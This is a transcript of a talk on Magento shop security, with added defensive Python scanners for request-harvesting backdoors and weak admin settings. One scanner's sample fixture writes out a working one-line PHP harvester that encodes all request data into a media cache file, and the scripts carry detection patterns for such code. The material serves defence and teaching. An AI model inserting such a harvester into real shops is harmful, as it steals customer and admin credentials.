What could possibly go wrong? Security in Magento Shops

Stolen customer data, unreachable shops, blackmail: there is a long list of possible attacks on Magento shops. Andreas von Studnitz, who has been building Magento shops since 2008, talks about successful and attempted attacks, about security vulnerabilities and other risks. Learn what you as a shop manager can and should do to protect your shop against attacks of all kinds.

Transcript
Slide 1: What could possibly go wrong? Security in Magento Shops
Andreas von Studnitz
• integer_net (Aken / Germany)
• Consultant / Developer / Trainer / CEO
• Specialist for Magento and Solr
• @avstudnitz

Slide 2: Real Life Example
• One line of code added
• Reads all requests in admin and checkout areas
• Encodes and stores the data in media/cache_6e0a32[…]d53ee065da

Slide 3: Real Life Example
• Active for 6 months!
• 5,628 customer records (email address, name, telephone)
• 1,612 passwords
• All admin usernames and passwords
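The backdoor on slides 2 and 3 has a recognisable shape: a single added line that reads the request, encodes it and appends it to an innocuous-looking file under media/. The following scanner is an added example (not code from the talk, and not the real malware, which the slides do not show): it walks a Magento docroot, flags PHP lines that combine a request source, an encoder and a file-write sink, and lists files under media/ whose names follow the media/cache_<hex> pattern from the slide. The sample docroot, the injected line and the dump file name are constructed for the demo.

```python
"""
Scanner for the kind of one-line request-harvesting backdoor described on the
"Real Life Example" slides. Added example, not code from the talk: the injected
line and the sample docroot below are constructed to match the described
behaviour (reads requests, encodes them, appends them to media/cache_<hex>).
"""
import os
import re
import tempfile

# A harvesting line needs all three: a request source, an encoder, a file sink.
# Requiring the conjunction keeps normal cache writes and normal POST handling
# from being flagged.
REQUEST_SOURCES = re.compile(r"\$_(?:POST|REQUEST|GET)\b|->getPost\(|->getParams\(")
ENCODERS = re.compile(r"\b(?:base64_encode|serialize|json_encode|gzcompress|bin2hex)\s*\(")
FILE_SINKS = re.compile(r"\b(?:file_put_contents|fwrite|fputs)\s*\(")
# Dump files named like the one on the slide: media/cache_<hex digits>
DUMP_NAME = re.compile(r"^cache_[0-9a-f]{8,}$")


def scan_php_source(src):
    """Return (line_number, line) for lines that read, encode and write request data."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if REQUEST_SOURCES.search(line) and ENCODERS.search(line) and FILE_SINKS.search(line):
            hits.append((lineno, line.strip()))
    return hits


def scan_tree(root):
    """Walk a Magento docroot: flag harvesting lines in PHP and dump files in media/."""
    findings = {"code": [], "dump_files": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.endswith((".php", ".phtml")):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, line in scan_php_source(fh.read()):
                        findings["code"].append((rel, lineno, line))
            elif rel.startswith("media/") and DUMP_NAME.match(name):
                findings["dump_files"].append(rel)
    return findings


# --- constructed sample docroot (hypothetical, for the demo only) -------------
# Line 7 is the injected harvesting line; line 6 (normal POST handling) and
# line 8 (a legitimate cache write) must not be flagged.
ACTION_PHP = """<?php
class Mage_Core_Controller_Varien_Action
{
    public function preDispatch()
    {
        $data = $this->getRequest()->getPost();
        file_put_contents('media/cache_3f9a1c7b2e', base64_encode(serialize($_REQUEST)), FILE_APPEND);
        file_put_contents($this->_cacheFile, serialize($data));
    }
}
"""


def build_sample_docroot():
    root = tempfile.mkdtemp(prefix="magento_")
    php_dir = os.path.join(root, "app", "code", "core", "Mage", "Core", "Controller", "Varien")
    os.makedirs(php_dir)
    with open(os.path.join(php_dir, "Action.php"), "w") as fh:
        fh.write(ACTION_PHP)
    # legitimate Magento media content that must not be reported
    os.makedirs(os.path.join(root, "media", "catalog", "product", "cache"))
    open(os.path.join(root, "media", "catalog", "product", "cache", "img.jpg"), "wb").close()
    # the dump file the injected line writes to
    open(os.path.join(root, "media", "cache_3f9a1c7b2e"), "wb").close()
    return root


def demo():
    return scan_tree(build_sample_docroot())


if __name__ == "__main__":
    result = demo()
    for rel, lineno, line in result["code"]:
        print(f"{rel}:{lineno}: {line}")
    for rel in result["dump_files"]:
        print(f"suspicious dump file: {rel}")
```

Run it against a real docroot with scan_tree("/var/www/magento"); a hit inside app/code/core is a strong signal, because core files never write request data to media/. The dump-file check only covers the naming pattern from the slide, so also diff the core tree against a clean copy of the same Magento release.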
Slide 4: Overview
• Consequences of Attacks
• Types of Attack
• Prevention

Slide 5: What can possibly go wrong? Consequences of Attacks

Slide 6: (image; source: www.ibm.com/security/data-breach/)

Slide 7: Stolen User Data

Slide 8: Stolen Login Data

Slide 9: Stolen Payment Data

Slide 10: This guy lost more than $50,000 in a data breach

Slide 11: Server Attacks

Slide 12: (image only)

Slide 13: (image only)

Slide 14: How can this happen with Magento? Vulnerabilities

Slide 15: Magento Unpatched
• Neither installed the latest version
• Nor applied important security patches
• (Insecure PHP version)

Slide 16: Example: Shoplift Bug (patched February 2015)

Slide 17: Magento shops vulnerable to Shoplift: 50,581 out of 255,558 (roughly 20%)
Source: byte.nl, April 2016

Slide 18: Weakly secured Admin Area
• http://magento.site/admin/
• http://magento.site/downloader/
• Username "admin"
• Low security passwords

Slide 19: What can an Attacker do with Admin Access? (1)
1. Log in
2. Upload a custom extension in the Magento Connect Manager (downloader)

Slide 20: What can an Attacker do with Admin Access? (2)
1. Log in
2. Inject custom JavaScript in System => Configuration
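Slides 18 to 20 describe four things a reviewer can check without a login: whether the admin router still answers under the default /admin/ front name, whether the downloader/ directory (Magento Connect Manager) is still deployed, whether a user named "admin" exists, and whether anything has been injected into the "HTML Head" / footer configuration that Magento emits into every page. The audit below is an added example, not code from the talk; it reads the admin frontName from app/etc/local.xml (the real Magento 1 config location) and checks rows from core_config_data for the real Magento 1 paths design/head/includes and design/footer/absolute_footer. The local.xml, the config rows, the usernames and the sample docroot are constructed for the demo.

```python
"""
Offline audit for the "Weakly secured Admin Area" slide and the two admin-access
abuses that follow it. Added example, not code from the talk; all sample inputs
below are constructed.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

DEFAULT_ADMIN_USERS = {"admin", "administrator"}

# Magento 1 config paths whose values are written verbatim into every page
# (System > Configuration > Design > HTML Head / Footer).
HEAD_FOOTER_PATHS = ("design/head/includes", "design/footer/absolute_footer")

# The query a reviewer runs against the shop database; its rows are the
# (scope, scope_id, path, value) tuples that find_injected_scripts() expects.
CONFIG_QUERY = (
    "SELECT scope, scope_id, path, value FROM core_config_data "
    "WHERE path IN ('design/head/includes', 'design/footer/absolute_footer')"
)

SCRIPT_MARKERS = re.compile(r"<script\b|javascript:|\bon[a-z]+\s*=", re.I)


def admin_front_name(local_xml_text):
    """Read config/admin/routers/adminhtml/args/frontName from app/etc/local.xml.

    Magento falls back to "admin" when the element is absent, so do the same."""
    node = ET.fromstring(local_xml_text).find("admin/routers/adminhtml/args/frontName")
    if node is None or not (node.text or "").strip():
        return "admin"
    return node.text.strip()


def find_injected_scripts(rows):
    """Return config rows in the head/footer paths that carry script-like content."""
    return [row for row in rows
            if row[2] in HEAD_FOOTER_PATHS and SCRIPT_MARKERS.search(row[3] or "")]


def audit(docroot, local_xml_text, config_rows, admin_usernames):
    front = admin_front_name(local_xml_text)
    return {
        "admin_front_name": front,
        "default_admin_path": front == "admin",
        "downloader_present": os.path.isdir(os.path.join(docroot, "downloader")),
        "default_admin_users": sorted(u for u in admin_usernames
                                      if u.lower() in DEFAULT_ADMIN_USERS),
        "injected_scripts": find_injected_scripts(config_rows),
    }


# --- constructed sample inputs (hypothetical, for the demo only) --------------
SAMPLE_LOCAL_XML = """<?xml version="1.0"?>
<config>
    <admin>
        <routers>
            <adminhtml>
                <args>
                    <frontName><![CDATA[admin]]></frontName>
                </args>
            </adminhtml>
        </routers>
    </admin>
</config>
"""

SAMPLE_CONFIG_ROWS = [
    ("default", 0, "design/head/includes",
     '<link rel="stylesheet" type="text/css" href="/skin/frontend/base/default/css/print.css" />'),
    ("stores", 1, "design/head/includes",
     '<script type="text/javascript" src="https://cdn.example.invalid/ga.js"></script>'),
    ("default", 0, "design/footer/copyright", "&copy; 2016 Example Shop"),
]
SAMPLE_ADMIN_USERS = ["admin", "shopowner"]


def build_sample_docroot():
    root = tempfile.mkdtemp(prefix="magento_")
    os.makedirs(os.path.join(root, "downloader"))   # Connect Manager still shipped
    return root


def demo():
    return audit(build_sample_docroot(), SAMPLE_LOCAL_XML, SAMPLE_CONFIG_ROWS, SAMPLE_ADMIN_USERS)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A script tag in design/head/includes is not proof of compromise (tracking snippets are commonly placed there), but every row the audit returns should be traceable to a change you made; a store-scope override you did not add is exactly the slide 20 case. Fixing the first three findings means a non-default frontName, removing downloader/ from production and renaming or deleting the "admin" user.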
Slide 21: (image only)

Slide 22: Security issues in extensions
• Custom or purchased extensions
• SQL Injection, XSS, …
• Backdoors
• Installation service

Slide 23: How can I prevent Attacks?

Slide 24: 1. Follow basic Guidelines
• Update Magento and PHP
• Secure the admin area
• Subscribe to the security mailing list

Slide 25: 2. Check your Site

Slide 26: 3. Do security reviews
Severe security issues found in more than 50% of my reviews

Slide 27: Q & A
Please contact me!
@avstudnitz avs@integer-net.com
@integer_net www.integer-net.com
